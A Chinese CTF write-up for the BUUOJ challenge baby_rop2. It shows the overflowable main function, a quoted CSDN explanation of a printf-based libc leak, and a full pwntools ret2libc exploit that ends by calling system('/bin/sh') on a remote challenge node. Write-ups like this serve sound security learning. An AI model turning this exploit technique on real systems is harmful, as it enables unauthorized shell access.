学pwn越学越开心讲真的,现在补坑效率高了好多。
例题buu [HarekazeCTF2019]baby_rop2
正常做libc泄露都是用puts printf write,一般题目都会有puts比较方便
今天这个没有我只好用printf
如下buf可以溢出
1 2 3 4 5 6 7 8 9 10 11 12 13
| int __cdecl main(int argc, const char **argv, const char **envp) { char buf[28]; int v5;
setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 2, 0LL); printf("What's your name? "); v5 = read(0, buf, 0x100uLL); buf[v5 - 1] = 0; printf("Welcome to the Pwn World again, %s!\n", buf); return 0; }
|
这里侧重讲一点printf参数的填充,人比较懒就拿别人的了,
主要是提醒自己掌握各种函数的参数的填充问题
1 2 3 4 5 6 7 8 9
| ‘a’*0x28–>造成溢出,覆盖到了返回地址 p64(pop_rdi)+p64(format_str)–>我们在原本语句的返回地址上写入了pop_rdi,ret,pop_rdi,对应参数format_str,执行后将formast_str的值设置给了rdi,之后执行ret(返回指令) p64(pop_rsi_r15)+p64(read_got)+p64(0)–> 我们将2中的ret写成了pop_rsi,pop_r15,ret;执行指令pop_rsi对应参数read_got,将rsi寄存器的值设置成了read函数的got表地址,pop_r15对应参数0,由于我们不用r15,随便设置一下它,我是设置成了0 p64(printf_plt)–>将3中的ret设置成printf函数的plt表地址,实际上就是printf函数的地址,去执行printf函数,输出我们设置的read函数的地址 p64(main_addr)–> 在完成第一次利用后,得到了程序内read函数的地址,知道了libc基址,我们需要重新回到程序开头,再次利用这个输入点去写入system‘(/bin/sh)’ 接收输出的read函数地址 ———————————————— 版权声明:本文为CSDN博主「银河以北,吾彦最美」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/mcmuyanga/article/details/108918335
|
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35
| from pwn import * from LibcSearcher import * context.log_level = 'debug'
#p = process('./babyrop2') p = remote('node3.buuoj.cn',28485) elf = ELF('babyrop2')
pop_rdi = 0x0000000000400733 pop_rsi_r15 = 0x0000000000400731 format_str = 0x0000000000400770 ret_addr = 0x0000000000400734
printf_plt = elf.plt['printf'] read_got = elf.got['read'] main_plt = elf.sym['main']
payload = 'a'*0x28+p64(pop_rdi)+p64(format_str)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_plt)
p.recvuntil("name? ") p.sendline(payload)
read_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) print hex(read_addr) libc = LibcSearcher('read', read_addr) libc_base = read_addr - libc.dump('read')
sys_addr = libc_base + libc.dump('system') bin_sh = libc_base + libc.dump('str_bin_sh')
payload = 'a'*0x28+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr) p.sendline(payload) p.interactive()
|